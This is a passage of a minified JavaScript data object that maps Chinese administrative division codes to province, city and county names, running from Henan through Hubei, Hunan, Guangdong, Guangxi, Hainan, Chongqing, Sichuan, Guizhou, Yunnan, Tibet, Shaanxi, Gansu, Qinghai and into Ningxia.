"淮阳县",411627:"太康县",411628:"鹿邑县",411681:"项城市",411682:"其它区",411700:"驻马店市",411702:"驿城区",411721:"西平县",411722:"上蔡县",411723:"平舆县",411724:"正阳县",411725:"确山县",411726:"泌阳县",411727:"汝南县",411728:"遂平县",411729:"新蔡县",411730:"其它区",42e4:"湖北省",420100:"武汉市",420102:"江岸区",420103:"江汉区",420104:"硚口区",420105:"汉阳区",420106:"武昌区",420107:"青山区",420111:"洪山区",420112:"东西湖区",420113:"汉南区",420114:"蔡甸区",420115:"江夏区",420116:"黄陂区",420117:"新洲区",420118:"其它区",420200:"黄石市",420202:"黄石港区",420203:"西塞山区",420204:"下陆区",420205:"铁山区",420222:"阳新县",420281:"大冶市",420282:"其它区",420300:"十堰市",420302:"茅箭区",420303:"张湾区",420321:"郧县",420322:"郧西县",420323:"竹山县",420324:"竹溪县",420325:"房县",420381:"丹江口市",420383:"其它区",420500:"宜昌市",420502:"西陵区",420503:"伍家岗区",420504:"点军区",420505:"猇亭区",420506:"夷陵区",420525:"远安县",420526:"兴山县",420527:"秭归县",420528:"长阳土家族自治县",420529:"五峰土家族自治县",420581:"宜都市",420582:"当阳市",420583:"枝江市",420584:"其它区",420600:"襄阳市",420602:"襄城区",420606:"樊城区",420607:"襄州区",420624:"南漳县",420625:"谷城县",420626:"保康县",420682:"老河口市",420683:"枣阳市",420684:"宜城市",420685:"其它区",420700:"鄂州市",420702:"梁子湖区",420703:"华容区",420704:"鄂城区",420705:"其它区",420800:"荆门市",420802:"东宝区",420804:"掇刀区",420821:"京山县",420822:"沙洋县",420881:"钟祥市",420882:"其它区",420900:"孝感市",420902:"孝南区",420921:"孝昌县",420922:"大悟县",420923:"云梦县",420981:"应城市",420982:"安陆市",420984:"汉川市",420985:"其它区",421e3:"荆州市",421002:"沙市区",421003:"荆州区",421022:"公安县",421023:"监利县",421024:"江陵县",421081:"石首市",421083:"洪湖市",421087:"松滋市",421088:"其它区",421100:"黄冈市",421102:"黄州区",421121:"团风县",421122:"红安县",421123:"罗田县",421124:"英山县",421125:"浠水县",421126:"蕲春县",421127:"黄梅县",421181:"麻城市",421182:"武穴市",421183:"其它区",421200:"咸宁市",421202:"咸安区",421221:"嘉鱼县",421222:"通城县",421223:"崇阳县",421224:"通山县",421281:"赤壁市",421283:"其它区",421300:"随州市",421302:"曾都区",421321:"随县",421381:"广水市",421382:"其它区",422800:"恩施土家族苗族自治州",422801:"恩施市",422802:"利川市",422822:"建始县",422823:"巴东县",422825:"宣恩县",422826:"咸丰县",422827:"来凤县",422828:"鹤峰县",422829:"其它区",429004:"仙桃市",429005:"潜江市",429006:"天门市",429021:"神农架林区",43e4:"湖南省",430100:"长沙市",430102:"芙蓉区",430103:"天心区",430104:"岳麓区",430105:"开福区",430111:"雨花区",430121:"长沙县",430122:"望城区",430124:"宁乡县",430181:"浏阳市",430182:"其它区",430200:"株洲市",430202:"荷塘区",430203:"芦淞区",430204:"石峰区",430211:"天元区",430221:"株洲县",430223:"攸县",430224:"茶陵县",430225:"炎陵县",430281:"醴陵市",430282:"其它区",430300:"湘潭市",430302:"雨湖区",430304:"岳塘区",430321:"湘潭县",430381:"湘乡市",430382:"韶山市",430383:"其它区",430400:"衡阳市",430405:"珠晖区",430406:"雁峰区",430407:"石鼓区",430408:"蒸湘区",430412:"南岳区",430421:"衡阳县",430422:"衡南县",430423:"衡山县",430424:"衡东县",430426:"祁东县",430481:"耒阳市",430482:"常宁市",430483:"其它区",430500:"邵阳市",430502:"双清区",430503:"大祥区",430511:"北塔区",430521:"邵东县",430522:"新邵县",430523:"邵阳县",430524:"隆回县",430525:"洞口县",430527:"绥宁县",430528:"新宁县",430529:"城步苗族自治县",430581:"武冈市",430582:"其它区",430600:"岳阳市",430602:"岳阳楼区",430603:"云溪区",430611:"君山区",430621:"岳阳县",430623:"华容县",430624:"湘阴县",430626:"平江县",430681:"汨罗市",430682:"临湘市",430683:"其它区",430700:"常德市",430702:"武陵区",430703:"鼎城区",430721:"安乡县",430722:"汉寿县",430723:"澧县",430724:"临澧县",430725:"桃源县",430726:"石门县",430781:"津市市",430782:"其它区",430800:"张家界市",430802:"永定区",430811:"武陵源区",430821:"慈利县",430822:"桑植县",430823:"其它区",430900:"益阳市",430902:"资阳区",430903:"赫山区",430921:"南县",430922:"桃江县",430923:"安化县",430981:"沅江市",430982:"其它区",431e3:"郴州市",431002:"北湖区",431003:"苏仙区",431021:"桂阳县",431022:"宜章县",431023:"永兴县",431024:"嘉禾县",431025:"临武县",431026:"汝城县",431027:"桂东县",431028:"安仁县",431081:"资兴市",431082:"其它区",431100:"永州市",431102:"零陵区",431103:"冷水滩区",431121:"祁阳县",431122:"东安县",431123:"双牌县",431124:"道县",431125:"江永县",431126:"宁远县",431127:"蓝山县",431128:"新田县",431129:"江华瑶族自治县",431130:"其它区",431200:"怀化市",431202:"鹤城区",431221:"中方县",431222:"沅陵县",431223:"辰溪县",431224:"溆浦县",431225:"会同县",431226:"麻阳苗族自治县",431227:"新晃侗族自治县",431228:"芷江侗族自治县",431229:"靖州苗族侗族自治县",431230:"通道侗族自治县",431281:"洪江市",431282:"其它区",431300:"娄底市",431302:"娄星区",431321:"双峰县",431322:"新化县",431381:"冷水江市",431382:"涟源市",431383:"其它区",433100:"湘西土家族苗族自治州",433101:"吉首市",433122:"泸溪县",433123:"凤凰县",433124:"花垣县",433125:"保靖县",433126:"古丈县",433127:"永顺县",433130:"龙山县",433131:"其它区",44e4:"广东省",440100:"广州市",440103:"荔湾区",440104:"越秀区",440105:"海珠区",440106:"天河区",440111:"白云区",440112:"黄埔区",440113:"番禺区",440114:"花都区",440115:"南沙区",440116:"萝岗区",440183:"增城市",440184:"从化市",440189:"其它区",440200:"韶关市",440203:"武江区",440204:"浈江区",440205:"曲江区",440222:"始兴县",440224:"仁化县",440229:"翁源县",440232:"乳源瑶族自治县",440233:"新丰县",440281:"乐昌市",440282:"南雄市",440283:"其它区",440300:"深圳市",440303:"罗湖区",440304:"福田区",440305:"南山区",440306:"宝安区",440307:"龙岗区",440308:"盐田区",440309:"其它区",440320:"光明新区",440321:"坪山新区",440322:"大鹏新区",440323:"龙华新区",440400:"珠海市",440402:"香洲区",440403:"斗门区",440404:"金湾区",440488:"其它区",440500:"汕头市",440507:"龙湖区",440511:"金平区",440512:"濠江区",440513:"潮阳区",440514:"潮南区",440515:"澄海区",440523:"南澳县",440524:"其它区",440600:"佛山市",440604:"禅城区",440605:"南海区",440606:"顺德区",440607:"三水区",440608:"高明区",440609:"其它区",440700:"江门市",440703:"蓬江区",440704:"江海区",440705:"新会区",440781:"台山市",440783:"开平市",440784:"鹤山市",440785:"恩平市",440786:"其它区",440800:"湛江市",440802:"赤坎区",440803:"霞山区",440804:"坡头区",440811:"麻章区",440823:"遂溪县",440825:"徐闻县",440881:"廉江市",440882:"雷州市",440883:"吴川市",440884:"其它区",440900:"茂名市",440902:"茂南区",440903:"茂港区",440923:"电白县",440981:"高州市",440982:"化州市",440983:"信宜市",440984:"其它区",441200:"肇庆市",441202:"端州区",441203:"鼎湖区",441223:"广宁县",441224:"怀集县",441225:"封开县",441226:"德庆县",441283:"高要市",441284:"四会市",441285:"其它区",441300:"惠州市",441302:"惠城区",441303:"惠阳区",441322:"博罗县",441323:"惠东县",441324:"龙门县",441325:"其它区",441400:"梅州市",441402:"梅江区",441421:"梅县",441422:"大埔县",441423:"丰顺县",441424:"五华县",441426:"平远县",441427:"蕉岭县",441481:"兴宁市",441482:"其它区",441500:"汕尾市",441502:"城区",441521:"海丰县",441523:"陆河县",441581:"陆丰市",441582:"其它区",441600:"河源市",441602:"源城区",441621:"紫金县",441622:"龙川县",441623:"连平县",441624:"和平县",441625:"东源县",441626:"其它区",441700:"阳江市",441702:"江城区",441721:"阳西县",441723:"阳东县",441781:"阳春市",441782:"其它区",441800:"清远市",441802:"清城区",441821:"佛冈县",441823:"阳山县",441825:"连山壮族瑶族自治县",441826:"连南瑶族自治县",441827:"清新区",441881:"英德市",441882:"连州市",441883:"其它区",441900:"东莞市",442e3:"中山市",442101:"东沙群岛",445100:"潮州市",445102:"湘桥区",445121:"潮安区",445122:"饶平县",445186:"其它区",445200:"揭阳市",445202:"榕城区",445221:"揭东区",445222:"揭西县",445224:"惠来县",445281:"普宁市",445285:"其它区",445300:"云浮市",445302:"云城区",445321:"新兴县",445322:"郁南县",445323:"云安县",445381:"罗定市",445382:"其它区",45e4:"广西壮族自治区",450100:"南宁市",450102:"兴宁区",450103:"青秀区",450105:"江南区",450107:"西乡塘区",450108:"良庆区",450109:"邕宁区",450122:"武鸣县",450123:"隆安县",450124:"马山县",450125:"上林县",450126:"宾阳县",450127:"横县",450128:"其它区",450200:"柳州市",450202:"城中区",450203:"鱼峰区",450204:"柳南区",450205:"柳北区",450221:"柳江县",450222:"柳城县",450223:"鹿寨县",450224:"融安县",450225:"融水苗族自治县",450226:"三江侗族自治县",450227:"其它区",450300:"桂林市",450302:"秀峰区",450303:"叠彩区",450304:"象山区",450305:"七星区",450311:"雁山区",450321:"阳朔县",450322:"临桂区",450323:"灵川县",450324:"全州县",450325:"兴安县",450326:"永福县",450327:"灌阳县",450328:"龙胜各族自治县",450329:"资源县",450330:"平乐县",450331:"荔浦县",450332:"恭城瑶族自治县",450333:"其它区",450400:"梧州市",450403:"万秀区",450405:"长洲区",450406:"龙圩区",450421:"苍梧县",450422:"藤县",450423:"蒙山县",450481:"岑溪市",450482:"其它区",450500:"北海市",450502:"海城区",450503:"银海区",450512:"铁山港区",450521:"合浦县",450522:"其它区",450600:"防城港市",450602:"港口区",450603:"防城区",450621:"上思县",450681:"东兴市",450682:"其它区",450700:"钦州市",450702:"钦南区",450703:"钦北区",450721:"灵山县",450722:"浦北县",450723:"其它区",450800:"贵港市",450802:"港北区",450803:"港南区",450804:"覃塘区",450821:"平南县",450881:"桂平市",450882:"其它区",450900:"玉林市",450902:"玉州区",450903:"福绵区",450921:"容县",450922:"陆川县",450923:"博白县",450924:"兴业县",450981:"北流市",450982:"其它区",451e3:"百色市",451002:"右江区",451021:"田阳县",451022:"田东县",451023:"平果县",451024:"德保县",451025:"靖西县",451026:"那坡县",451027:"凌云县",451028:"乐业县",451029:"田林县",451030:"西林县",451031:"隆林各族自治县",451032:"其它区",451100:"贺州市",451102:"八步区",451119:"平桂管理区",451121:"昭平县",451122:"钟山县",451123:"富川瑶族自治县",451124:"其它区",451200:"河池市",451202:"金城江区",451221:"南丹县",451222:"天峨县",451223:"凤山县",451224:"东兰县",451225:"罗城仫佬族自治县",451226:"环江毛南族自治县",451227:"巴马瑶族自治县",451228:"都安瑶族自治县",451229:"大化瑶族自治县",451281:"宜州市",451282:"其它区",451300:"来宾市",451302:"兴宾区",451321:"忻城县",451322:"象州县",451323:"武宣县",451324:"金秀瑶族自治县",451381:"合山市",451382:"其它区",451400:"崇左市",451402:"江州区",451421:"扶绥县",451422:"宁明县",451423:"龙州县",451424:"大新县",451425:"天等县",451481:"凭祥市",451482:"其它区",46e4:"海南省",460100:"海口市",460105:"秀英区",460106:"龙华区",460107:"琼山区",460108:"美兰区",460109:"其它区",460200:"三亚市",460300:"三沙市",460321:"西沙群岛",460322:"南沙群岛",460323:"中沙群岛的岛礁及其海域",469001:"五指山市",469002:"琼海市",469003:"儋州市",469005:"文昌市",469006:"万宁市",469007:"东方市",469025:"定安县",469026:"屯昌县",469027:"澄迈县",469028:"临高县",469030:"白沙黎族自治县",469031:"昌江黎族自治县",469033:"乐东黎族自治县",469034:"陵水黎族自治县",469035:"保亭黎族苗族自治县",469036:"琼中黎族苗族自治县",471005:"其它区",5e5:"重庆",500100:"重庆市",500101:"万州区",500102:"涪陵区",500103:"渝中区",500104:"大渡口区",500105:"江北区",500106:"沙坪坝区",500107:"九龙坡区",500108:"南岸区",500109:"北碚区",500110:"万盛区",500111:"双桥区",500112:"渝北区",500113:"巴南区",500114:"黔江区",500115:"长寿区",500222:"綦江区",500223:"潼南县",500224:"铜梁县",500225:"大足区",500226:"荣昌县",500227:"璧山县",500228:"梁平县",500229:"城口县",500230:"丰都县",500231:"垫江县",500232:"武隆县",500233:"忠县",500234:"开县",500235:"云阳县",500236:"奉节县",500237:"巫山县",500238:"巫溪县",500240:"石柱土家族自治县",500241:"秀山土家族苗族自治县",500242:"酉阳土家族苗族自治县",500243:"彭水苗族土家族自治县",500381:"江津区",500382:"合川区",500383:"永川区",500384:"南川区",500385:"其它区",51e4:"四川省",510100:"成都市",510104:"锦江区",510105:"青羊区",510106:"金牛区",510107:"武侯区",510108:"成华区",510112:"龙泉驿区",510113:"青白江区",510114:"新都区",510115:"温江区",510121:"金堂县",510122:"双流县",510124:"郫县",510129:"大邑县",510131:"蒲江县",510132:"新津县",510181:"都江堰市",510182:"彭州市",510183:"邛崃市",510184:"崇州市",510185:"其它区",510300:"自贡市",510302:"自流井区",510303:"贡井区",510304:"大安区",510311:"沿滩区",510321:"荣县",510322:"富顺县",510323:"其它区",510400:"攀枝花市",510402:"东区",510403:"西区",510411:"仁和区",510421:"米易县",510422:"盐边县",510423:"其它区",510500:"泸州市",510502:"江阳区",510503:"纳溪区",510504:"龙马潭区",510521:"泸县",510522:"合江县",510524:"叙永县",510525:"古蔺县",510526:"其它区",510600:"德阳市",510603:"旌阳区",510623:"中江县",510626:"罗江县",510681:"广汉市",510682:"什邡市",510683:"绵竹市",510684:"其它区",510700:"绵阳市",510703:"涪城区",510704:"游仙区",510722:"三台县",510723:"盐亭县",510724:"安县",510725:"梓潼县",510726:"北川羌族自治县",510727:"平武县",510781:"江油市",510782:"其它区",510800:"广元市",510802:"利州区",510811:"昭化区",510812:"朝天区",510821:"旺苍县",510822:"青川县",510823:"剑阁县",510824:"苍溪县",510825:"其它区",510900:"遂宁市",510903:"船山区",510904:"安居区",510921:"蓬溪县",510922:"射洪县",510923:"大英县",510924:"其它区",511e3:"内江市",511002:"市中区",511011:"东兴区",511024:"威远县",511025:"资中县",511028:"隆昌县",511029:"其它区",511100:"乐山市",511102:"市中区",511111:"沙湾区",511112:"五通桥区",511113:"金口河区",511123:"犍为县",511124:"井研县",511126:"夹江县",511129:"沐川县",511132:"峨边彝族自治县",511133:"马边彝族自治县",511181:"峨眉山市",511182:"其它区",511300:"南充市",511302:"顺庆区",511303:"高坪区",511304:"嘉陵区",511321:"南部县",511322:"营山县",511323:"蓬安县",511324:"仪陇县",511325:"西充县",511381:"阆中市",511382:"其它区",511400:"眉山市",511402:"东坡区",511421:"仁寿县",511422:"彭山县",511423:"洪雅县",511424:"丹棱县",511425:"青神县",511426:"其它区",511500:"宜宾市",511502:"翠屏区",511521:"宜宾县",511522:"南溪区",511523:"江安县",511524:"长宁县",511525:"高县",511526:"珙县",511527:"筠连县",511528:"兴文县",511529:"屏山县",511530:"其它区",511600:"广安市",511602:"广安区",511603:"前锋区",511621:"岳池县",511622:"武胜县",511623:"邻水县",511681:"华蓥市",511683:"其它区",511700:"达州市",511702:"通川区",511721:"达川区",511722:"宣汉县",511723:"开江县",511724:"大竹县",511725:"渠县",511781:"万源市",511782:"其它区",511800:"雅安市",511802:"雨城区",511821:"名山区",511822:"荥经县",511823:"汉源县",511824:"石棉县",511825:"天全县",511826:"芦山县",511827:"宝兴县",511828:"其它区",511900:"巴中市",511902:"巴州区",511903:"恩阳区",511921:"通江县",511922:"南江县",511923:"平昌县",511924:"其它区",512e3:"资阳市",512002:"雁江区",512021:"安岳县",512022:"乐至县",512081:"简阳市",512082:"其它区",513200:"阿坝藏族羌族自治州",513221:"汶川县",513222:"理县",513223:"茂县",513224:"松潘县",513225:"九寨沟县",513226:"金川县",513227:"小金县",513228:"黑水县",513229:"马尔康县",513230:"壤塘县",513231:"阿坝县",513232:"若尔盖县",513233:"红原县",513234:"其它区",513300:"甘孜藏族自治州",513321:"康定县",513322:"泸定县",513323:"丹巴县",513324:"九龙县",513325:"雅江县",513326:"道孚县",513327:"炉霍县",513328:"甘孜县",513329:"新龙县",513330:"德格县",513331:"白玉县",513332:"石渠县",513333:"色达县",513334:"理塘县",513335:"巴塘县",513336:"乡城县",513337:"稻城县",513338:"得荣县",513339:"其它区",513400:"凉山彝族自治州",513401:"西昌市",513422:"木里藏族自治县",513423:"盐源县",513424:"德昌县",513425:"会理县",513426:"会东县",513427:"宁南县",513428:"普格县",513429:"布拖县",513430:"金阳县",513431:"昭觉县",513432:"喜德县",513433:"冕宁县",513434:"越西县",513435:"甘洛县",513436:"美姑县",513437:"雷波县",513438:"其它区",52e4:"贵州省",520100:"贵阳市",520102:"南明区",520103:"云岩区",520111:"花溪区",520112:"乌当区",520113:"白云区",520121:"开阳县",520122:"息烽县",520123:"修文县",520151:"观山湖区",520181:"清镇市",520182:"其它区",520200:"六盘水市",520201:"钟山区",520203:"六枝特区",520221:"水城县",520222:"盘县",520223:"其它区",520300:"遵义市",520302:"红花岗区",520303:"汇川区",520321:"遵义县",520322:"桐梓县",520323:"绥阳县",520324:"正安县",520325:"道真仡佬族苗族自治县",520326:"务川仡佬族苗族自治县",520327:"凤冈县",520328:"湄潭县",520329:"余庆县",520330:"习水县",520381:"赤水市",520382:"仁怀市",520383:"其它区",520400:"安顺市",520402:"西秀区",520421:"平坝县",520422:"普定县",520423:"镇宁布依族苗族自治县",520424:"关岭布依族苗族自治县",520425:"紫云苗族布依族自治县",520426:"其它区",522200:"铜仁市",522201:"碧江区",522222:"江口县",522223:"玉屏侗族自治县",522224:"石阡县",522225:"思南县",522226:"印江土家族苗族自治县",522227:"德江县",522228:"沿河土家族自治县",522229:"松桃苗族自治县",522230:"万山区",522231:"其它区",522300:"黔西南布依族苗族自治州",522301:"兴义市",522322:"兴仁县",522323:"普安县",522324:"晴隆县",522325:"贞丰县",522326:"望谟县",522327:"册亨县",522328:"安龙县",522329:"其它区",522400:"毕节市",522401:"七星关区",522422:"大方县",522423:"黔西县",522424:"金沙县",522425:"织金县",522426:"纳雍县",522427:"威宁彝族回族苗族自治县",522428:"赫章县",522429:"其它区",522600:"黔东南苗族侗族自治州",522601:"凯里市",522622:"黄平县",522623:"施秉县",522624:"三穗县",522625:"镇远县",522626:"岑巩县",522627:"天柱县",522628:"锦屏县",522629:"剑河县",522630:"台江县",522631:"黎平县",522632:"榕江县",522633:"从江县",522634:"雷山县",522635:"麻江县",522636:"丹寨县",522637:"其它区",522700:"黔南布依族苗族自治州",522701:"都匀市",522702:"福泉市",522722:"荔波县",522723:"贵定县",522725:"瓮安县",522726:"独山县",522727:"平塘县",522728:"罗甸县",522729:"长顺县",522730:"龙里县",522731:"惠水县",522732:"三都水族自治县",522733:"其它区",53e4:"云南省",530100:"昆明市",530102:"五华区",530103:"盘龙区",530111:"官渡区",530112:"西山区",530113:"东川区",530121:"呈贡区",530122:"晋宁县",530124:"富民县",530125:"宜良县",530126:"石林彝族自治县",530127:"嵩明县",530128:"禄劝彝族苗族自治县",530129:"寻甸回族彝族自治县",530181:"安宁市",530182:"其它区",530300:"曲靖市",530302:"麒麟区",530321:"马龙县",530322:"陆良县",530323:"师宗县",530324:"罗平县",530325:"富源县",530326:"会泽县",530328:"沾益县",530381:"宣威市",530382:"其它区",530400:"玉溪市",530402:"红塔区",530421:"江川县",530422:"澄江县",530423:"通海县",530424:"华宁县",530425:"易门县",530426:"峨山彝族自治县",530427:"新平彝族傣族自治县",530428:"元江哈尼族彝族傣族自治县",530429:"其它区",530500:"保山市",530502:"隆阳区",530521:"施甸县",530522:"腾冲县",530523:"龙陵县",530524:"昌宁县",530525:"其它区",530600:"昭通市",530602:"昭阳区",530621:"鲁甸县",530622:"巧家县",530623:"盐津县",530624:"大关县",530625:"永善县",530626:"绥江县",530627:"镇雄县",530628:"彝良县",530629:"威信县",530630:"水富县",530631:"其它区",530700:"丽江市",530702:"古城区",530721:"玉龙纳西族自治县",530722:"永胜县",530723:"华坪县",530724:"宁蒗彝族自治县",530725:"其它区",530800:"普洱市",530802:"思茅区",530821:"宁洱哈尼族彝族自治县",530822:"墨江哈尼族自治县",530823:"景东彝族自治县",530824:"景谷傣族彝族自治县",530825:"镇沅彝族哈尼族拉祜族自治县",530826:"江城哈尼族彝族自治县",530827:"孟连傣族拉祜族佤族自治县",530828:"澜沧拉祜族自治县",530829:"西盟佤族自治县",530830:"其它区",530900:"临沧市",530902:"临翔区",530921:"凤庆县",530922:"云县",530923:"永德县",530924:"镇康县",530925:"双江拉祜族佤族布朗族傣族自治县",530926:"耿马傣族佤族自治县",530927:"沧源佤族自治县",530928:"其它区",532300:"楚雄彝族自治州",532301:"楚雄市",532322:"双柏县",532323:"牟定县",532324:"南华县",532325:"姚安县",532326:"大姚县",532327:"永仁县",532328:"元谋县",532329:"武定县",532331:"禄丰县",532332:"其它区",532500:"红河哈尼族彝族自治州",532501:"个旧市",532502:"开远市",532522:"蒙自市",532523:"屏边苗族自治县",532524:"建水县",532525:"石屏县",532526:"弥勒市",532527:"泸西县",532528:"元阳县",532529:"红河县",532530:"金平苗族瑶族傣族自治县",532531:"绿春县",532532:"河口瑶族自治县",532533:"其它区",532600:"文山壮族苗族自治州",532621:"文山市",532622:"砚山县",532623:"西畴县",532624:"麻栗坡县",532625:"马关县",532626:"丘北县",532627:"广南县",532628:"富宁县",532629:"其它区",532800:"西双版纳傣族自治州",532801:"景洪市",532822:"勐海县",532823:"勐腊县",532824:"其它区",532900:"大理白族自治州",532901:"大理市",532922:"漾濞彝族自治县",532923:"祥云县",532924:"宾川县",532925:"弥渡县",532926:"南涧彝族自治县",532927:"巍山彝族回族自治县",532928:"永平县",532929:"云龙县",532930:"洱源县",532931:"剑川县",532932:"鹤庆县",532933:"其它区",533100:"德宏傣族景颇族自治州",533102:"瑞丽市",533103:"芒市",533122:"梁河县",533123:"盈江县",533124:"陇川县",533125:"其它区",533300:"怒江傈僳族自治州",533321:"泸水县",533323:"福贡县",533324:"贡山独龙族怒族自治县",533325:"兰坪白族普米族自治县",533326:"其它区",533400:"迪庆藏族自治州",533421:"香格里拉县",533422:"德钦县",533423:"维西傈僳族自治县",533424:"其它区",54e4:"西藏自治区",540100:"拉萨市",540102:"城关区",540121:"林周县",540122:"当雄县",540123:"尼木县",540124:"曲水县",540125:"堆龙德庆县",540126:"达孜县",540127:"墨竹工卡县",540128:"其它区",542100:"昌都地区",542121:"昌都县",542122:"江达县",542123:"贡觉县",542124:"类乌齐县",542125:"丁青县",542126:"察雅县",542127:"八宿县",542128:"左贡县",542129:"芒康县",542132:"洛隆县",542133:"边坝县",542134:"其它区",542200:"山南地区",542221:"乃东县",542222:"扎囊县",542223:"贡嘎县",542224:"桑日县",542225:"琼结县",542226:"曲松县",542227:"措美县",542228:"洛扎县",542229:"加查县",542231:"隆子县",542232:"错那县",542233:"浪卡子县",542234:"其它区",542300:"日喀则地区",542301:"日喀则市",542322:"南木林县",542323:"江孜县",542324:"定日县",542325:"萨迦县",542326:"拉孜县",542327:"昂仁县",542328:"谢通门县",542329:"白朗县",542330:"仁布县",542331:"康马县",542332:"定结县",542333:"仲巴县",542334:"亚东县",542335:"吉隆县",542336:"聂拉木县",542337:"萨嘎县",542338:"岗巴县",542339:"其它区",542400:"那曲地区",542421:"那曲县",542422:"嘉黎县",542423:"比如县",542424:"聂荣县",542425:"安多县",542426:"申扎县",542427:"索县",542428:"班戈县",542429:"巴青县",542430:"尼玛县",542431:"其它区",542432:"双湖县",542500:"阿里地区",542521:"普兰县",542522:"札达县",542523:"噶尔县",542524:"日土县",542525:"革吉县",542526:"改则县",542527:"措勤县",542528:"其它区",542600:"林芝地区",542621:"林芝县",542622:"工布江达县",542623:"米林县",542624:"墨脱县",542625:"波密县",542626:"察隅县",542627:"朗县",542628:"其它区",61e4:"陕西省",610100:"西安市",610102:"新城区",610103:"碑林区",610104:"莲湖区",610111:"灞桥区",610112:"未央区",610113:"雁塔区",610114:"阎良区",610115:"临潼区",610116:"长安区",610122:"蓝田县",610124:"周至县",610125:"户县",610126:"高陵县",610127:"其它区",610200:"铜川市",610202:"王益区",610203:"印台区",610204:"耀州区",610222:"宜君县",610223:"其它区",610300:"宝鸡市",610302:"渭滨区",610303:"金台区",610304:"陈仓区",610322:"凤翔县",610323:"岐山县",610324:"扶风县",610326:"眉县",610327:"陇县",610328:"千阳县",610329:"麟游县",610330:"凤县",610331:"太白县",610332:"其它区",610400:"咸阳市",610402:"秦都区",610403:"杨陵区",610404:"渭城区",610422:"三原县",610423:"泾阳县",610424:"乾县",610425:"礼泉县",610426:"永寿县",610427:"彬县",610428:"长武县",610429:"旬邑县",610430:"淳化县",610431:"武功县",610481:"兴平市",610482:"其它区",610500:"渭南市",610502:"临渭区",610521:"华县",610522:"潼关县",610523:"大荔县",610524:"合阳县",610525:"澄城县",610526:"蒲城县",610527:"白水县",610528:"富平县",610581:"韩城市",610582:"华阴市",610583:"其它区",610600:"延安市",610602:"宝塔区",610621:"延长县",610622:"延川县",610623:"子长县",610624:"安塞县",610625:"志丹县",610626:"吴起县",610627:"甘泉县",610628:"富县",610629:"洛川县",610630:"宜川县",610631:"黄龙县",610632:"黄陵县",610633:"其它区",610700:"汉中市",610702:"汉台区",610721:"南郑县",610722:"城固县",610723:"洋县",610724:"西乡县",610725:"勉县",610726:"宁强县",610727:"略阳县",610728:"镇巴县",610729:"留坝县",610730:"佛坪县",610731:"其它区",610800:"榆林市",610802:"榆阳区",610821:"神木县",610822:"府谷县",610823:"横山县",610824:"靖边县",610825:"定边县",610826:"绥德县",610827:"米脂县",610828:"佳县",610829:"吴堡县",610830:"清涧县",610831:"子洲县",610832:"其它区",610900:"安康市",610902:"汉滨区",610921:"汉阴县",610922:"石泉县",610923:"宁陕县",610924:"紫阳县",610925:"岚皋县",610926:"平利县",610927:"镇坪县",610928:"旬阳县",610929:"白河县",610930:"其它区",611e3:"商洛市",611002:"商州区",611021:"洛南县",611022:"丹凤县",611023:"商南县",611024:"山阳县",611025:"镇安县",611026:"柞水县",611027:"其它区",62e4:"甘肃省",620100:"兰州市",620102:"城关区",620103:"七里河区",620104:"西固区",620105:"安宁区",620111:"红古区",620121:"永登县",620122:"皋兰县",620123:"榆中县",620124:"其它区",620200:"嘉峪关市",620300:"金昌市",620302:"金川区",620321:"永昌县",620322:"其它区",620400:"白银市",620402:"白银区",620403:"平川区",620421:"靖远县",620422:"会宁县",620423:"景泰县",620424:"其它区",620500:"天水市",620502:"秦州区",620503:"麦积区",620521:"清水县",620522:"秦安县",620523:"甘谷县",620524:"武山县",620525:"张家川回族自治县",620526:"其它区",620600:"武威市",620602:"凉州区",620621:"民勤县",620622:"古浪县",620623:"天祝藏族自治县",620624:"其它区",620700:"张掖市",620702:"甘州区",620721:"肃南裕固族自治县",620722:"民乐县",620723:"临泽县",620724:"高台县",620725:"山丹县",620726:"其它区",620800:"平凉市",620802:"崆峒区",620821:"泾川县",620822:"灵台县",620823:"崇信县",620824:"华亭县",620825:"庄浪县",620826:"静宁县",620827:"其它区",620900:"酒泉市",620902:"肃州区",620921:"金塔县",620922:"瓜州县",620923:"肃北蒙古族自治县",620924:"阿克塞哈萨克族自治县",620981:"玉门市",620982:"敦煌市",620983:"其它区",621e3:"庆阳市",621002:"西峰区",621021:"庆城县",621022:"环县",621023:"华池县",621024:"合水县",621025:"正宁县",621026:"宁县",621027:"镇原县",621028:"其它区",621100:"定西市",621102:"安定区",621121:"通渭县",621122:"陇西县",621123:"渭源县",621124:"临洮县",621125:"漳县",621126:"岷县",621127:"其它区",621200:"陇南市",621202:"武都区",621221:"成县",621222:"文县",621223:"宕昌县",621224:"康县",621225:"西和县",621226:"礼县",621227:"徽县",621228:"两当县",621229:"其它区",622900:"临夏回族自治州",622901:"临夏市",622921:"临夏县",622922:"康乐县",622923:"永靖县",622924:"广河县",622925:"和政县",622926:"东乡族自治县",622927:"积石山保安族东乡族撒拉族自治县",622928:"其它区",623e3:"甘南藏族自治州",623001:"合作市",623021:"临潭县",623022:"卓尼县",623023:"舟曲县",623024:"迭部县",623025:"玛曲县",623026:"碌曲县",623027:"夏河县",623028:"其它区",63e4:"青海省",630100:"西宁市",630102:"城东区",630103:"城中区",630104:"城西区",630105:"城北区",630121:"大通回族土族自治县",630122:"湟中县",630123:"湟源县",630124:"其它区",632100:"海东市",632121:"平安县",632122:"民和回族土族自治县",632123:"乐都区",632126:"互助土族自治县",632127:"化隆回族自治县",632128:"循化撒拉族自治县",632129:"其它区",632200:"海北藏族自治州",632221:"门源回族自治县",632222:"祁连县",632223:"海晏县",632224:"刚察县",632225:"其它区",632300:"黄南藏族自治州",632321:"同仁县",632322:"尖扎县",632323:"泽库县",632324:"河南蒙古族自治县",632325:"其它区",632500:"海南藏族自治州",632521:"共和县",632522:"同德县",632523:"贵德县",632524:"兴海县",632525:"贵南县",632526:"其它区",632600:"果洛藏族自治州",632621:"玛沁县",632622:"班玛县",632623:"甘德县",632624:"达日县",632625:"久治县",632626:"玛多县",632627:"其它区",632700:"玉树藏族自治州",632721:"玉树市",632722:"杂多县",632723:"称多县",632724:"治多县",632725:"囊谦县",632726:"曲麻莱县",632727:"其它区",632800:"海西蒙古族藏族自治州",632801:"格尔木市",632802:"德令哈市",632821:"乌兰县",632822:"都兰县",632823:"天峻县",632824:"其它区",64e4:"宁夏回族自治区",640100:"银川市",640104:"兴庆区",640105:"西夏区",640106:"金凤区",640121:"永宁县",640122:"贺兰县",640181:"灵武市",640182:"其它区",640200:"石嘴山市",640202:"大武口区",640205:"惠农区",640221:"平罗县",640222:"其它区",640300:"吴忠市",640302:"利通区",640303:"红寺堡区",640323:"盐池县",640324:"同心县",640381:"青铜峡市",640382:"其它区",640400:"固原市",640402:"原州区",640422:"西吉县",640423:"隆德县",640424:"泾源县",640425:"彭阳县",640426:"其它区",640500:"中卫市",640502:"沙坡头区",640521:"中宁县